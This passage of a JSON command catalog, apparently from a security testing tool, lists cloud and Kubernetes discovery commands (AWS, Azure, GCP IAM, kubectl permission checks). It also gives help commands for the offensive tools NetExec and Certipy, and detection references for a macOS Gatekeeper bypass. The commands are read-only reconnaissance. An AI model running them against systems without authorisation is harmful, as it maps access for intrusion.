Xattr","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml"},{"type":"Jamf Protect: Detect activity related to xattr and extended attributes","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/xattr_extended_attributes_activity"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/xattr.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be"],"requires":[],"services":[],"aliases":[]},{"id":"daemon:reference:aws-identity","toolId":"daemon:aws","toolName":"aws","name":"Identify the active AWS principal","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["AWS"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"aws sts get-caller-identity --profile 'lab'","template":{"command":"aws sts get-caller-identity --profile {{profile}}","shell":"posix","variables":[{"key":"profile","label":"AWS profile","default":"lab"}]},"description":"Returns the account ID, ARN and user ID for the credentials selected by this profile.","expected":"Returns the account ID, ARN and user ID for the credentials selected by this profile.","troubleshooting":"ExpiredToken or InvalidClientTokenId means the selected credentials need refreshing. Check the profile before interpreting identity results.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://docs.aws.amazon.com/cli/latest/reference/sts/get-caller-identity.html"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:aws-config","toolId":"daemon:aws","toolName":"aws","name":"Inspect AWS configuration sources","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["AWS"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"aws configure list --profile 'lab'","template":{"command":"aws configure list --profile {{profile}}","shell":"posix","variables":[{"key":"profile","label":"AWS profile","default":"lab"}]},"description":"Shows resolved configuration and where each value comes from; credentials are masked.","expected":"Shows resolved configuration and where each value comes from; credentials are masked.","troubleshooting":"Environment variables can override profile configuration. Check the source column.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://docs.aws.amazon.com/cli/latest/reference/configure/list.html"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:aws-regions","toolId":"daemon:aws","toolName":"aws","name":"List enabled AWS regions","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["AWS"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"aws ec2 describe-regions --profile 'lab' --region 'eu-west-2'","template":{"command":"aws ec2 describe-regions --profile {{profile}} --region {{region}}","shell":"posix","variables":[{"key":"profile","label":"AWS profile","default":"lab"},{"key":"region","label":"Region","default":"eu-west-2"}]},"description":"Returns enabled region names and endpoints.","expected":"Returns enabled region names and endpoints.","troubleshooting":"Requires ec2:DescribeRegions. A denied request is not evidence that no regions exist.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-regions.html"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:azure-account","toolId":"daemon:az","toolName":"az","name":"Inspect the active Azure subscription","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Azure"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"az account show --output json","description":"Shows the active subscription, tenant and account.","expected":"Shows the active subscription, tenant and account.","troubleshooting":"Run the authorised sign-in workflow if the CLI has no current account.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://learn.microsoft.com/en-us/cli/azure/account?view=azure-cli-latest#az-account-show"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:azure-subscriptions","toolId":"daemon:az","toolName":"az","name":"List accessible Azure subscriptions","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Azure"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"az account list --output table","description":"Shows subscriptions available to the current account.","expected":"Shows subscriptions available to the current account.","troubleshooting":"A subscription list does not establish permissions on its resources.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://learn.microsoft.com/en-us/cli/azure/account?view=azure-cli-latest#az-account-list"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:gcp-projects","toolId":"daemon:gcloud","toolName":"gcloud","name":"List accessible GCP projects","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["GCP"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"gcloud projects list --format=json","description":"Lists visible projects for the active account.","expected":"Lists visible projects for the active account.","troubleshooting":"Service-account principal-set grants may not appear in this listing.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://cloud.google.com/sdk/gcloud/reference/projects/list"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:gcp-config","toolId":"daemon:gcloud","toolName":"gcloud","name":"Inspect the active gcloud configuration","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["GCP"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"gcloud config list","description":"Shows configured account, project and other properties.","expected":"Shows configured account, project and other properties.","troubleshooting":"Configured properties do not prove that the account has access to the selected project.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://cloud.google.com/sdk/gcloud/reference/config/list"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:gcp-policy","toolId":"daemon:gcloud","toolName":"gcloud","name":"Read a project IAM policy","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["GCP"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"gcloud projects get-iam-policy 'lab-project' --format=json","template":{"command":"gcloud projects get-iam-policy {{project}} --format=json","shell":"posix","variables":[{"key":"project","label":"GCP project","default":"lab-project"}]},"description":"Shows policy bindings visible to the current account.","expected":"Shows policy bindings visible to the current account.","troubleshooting":"Requires resourcemanager.projects.getIamPolicy; inherited grants need separate review.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://cloud.google.com/sdk/gcloud/reference/projects/get-iam-policy"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:kube-context","toolId":"daemon:kubectl","toolName":"kubectl","name":"Check the current Kubernetes context","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Containers"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"kubectl config current-context","description":"Prints the selected kubeconfig context without contacting the cluster.","expected":"Prints the selected kubeconfig context without contacting the cluster.","troubleshooting":"An unset current context must be selected before cluster queries.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Kubeconfig"],"mitre":[],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_config/kubectl_config_current-context/"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:kube-contexts","toolId":"daemon:kubectl","toolName":"kubectl","name":"List kubeconfig contexts","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Containers"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"kubectl config get-contexts","description":"Shows configured clusters, identities and namespaces.","expected":"Shows configured clusters, identities and namespaces.","troubleshooting":"This lists local configuration, not proof of cluster connectivity or permission.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Kubeconfig"],"mitre":[],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_config/kubectl_config_get-contexts/"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:kube-permissions","toolId":"daemon:kubectl","toolName":"kubectl","name":"Review permissions in a namespace","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Containers"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"kubectl auth can-i --list --namespace 'default'","template":{"command":"kubectl auth can-i --list --namespace {{namespace}}","shell":"posix","variables":[{"key":"namespace","label":"Namespace","default":"default"}]},"description":"Returns the server-reported rules for the active identity in this namespace.","expected":"Returns the server-reported rules for the active identity in this namespace.","troubleshooting":"Some authorizers cannot enumerate every rule. Check a specific verb/resource when the list is incomplete.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Kubeconfig"],"mitre":[],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_auth/kubectl_auth_can-i/"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:kube-pod-permission","toolId":"daemon:kubectl","toolName":"kubectl","name":"Check permission to list pods","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Containers"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"kubectl auth can-i list pods --namespace 'default'","template":{"command":"kubectl auth can-i list pods --namespace {{namespace}}","shell":"posix","variables":[{"key":"namespace","label":"Namespace","default":"default"}]},"description":"Returns yes or no for this particular action.","expected":"Returns yes or no for this particular action.","troubleshooting":"The selected context and namespace determine which identity and resources are checked.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Kubeconfig"],"mitre":[],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_auth/kubectl_auth_can-i/"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:nxc-modules","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"List available SMB modules","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Active Directory"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"nxc smb -L","description":"Lists modules supported by the installed NetExec version.","expected":"Lists modules supported by the installed NetExec version.","troubleshooting":"Module names and options vary by release. Inspect module help before using a module.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":[],"mitre":[],"references":["https://www.netexec.wiki/getting-started/using-modules"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:nxc-module-options","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"Inspect options for an SMB module","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Active Directory"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"nxc smb -M 'spider_plus' --options","template":{"command":"nxc smb -M {{module}} --options","shell":"posix","variables":[{"key":"module","label":"Module","default":"spider_plus"}]},"description":"Shows the selected module options.","expected":"Shows the selected module options.","troubleshooting":"This is module help, not a module run. Use the spelling reported by nxc smb -L.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":[],"mitre":[],"references":["https://www.netexec.wiki/getting-started/using-modules"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:nxc-help","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"Inspect SMB authentication and connection options","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Active Directory"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"nxc smb --help","description":"Shows flags supported by the installed SMB protocol implementation.","expected":"Shows flags supported by the installed SMB protocol implementation.","troubleshooting":"Use protocol-specific help because supported flags differ by protocol and version.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":[],"mitre":[],"references":["https://www.netexec.wiki/getting-started/selecting-and-using-a-protocol"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:certipy-find-help","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Inspect certificate discovery options","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Active Directory"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"certipy find -h","description":"Shows discovery, output and authentication options for the installed Certipy release.","expected":"Shows discovery, output and authentication options for the installed Certipy release.","troubleshooting":"Compare your installed release with the wiki before adapting an older example.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":[],"mitre":[],"references":["https://github.com/ly4k/Certipy/wiki/08-%E2%80%90-Command-Reference"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:certipy-version-help","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Inspect Certipy commands and version banner","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Active Directory"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"certipy -h","description":"Shows the installed command set and version banner.","expected":"Shows the installed command set and version banner.","troubleshooting":"The AD CS conditions behind an ESC label matter as much as CLI syntax; consult the linked official guide.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":[],"mitre":[],"references":["https://github.com/ly4k/Certipy/wiki"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]}]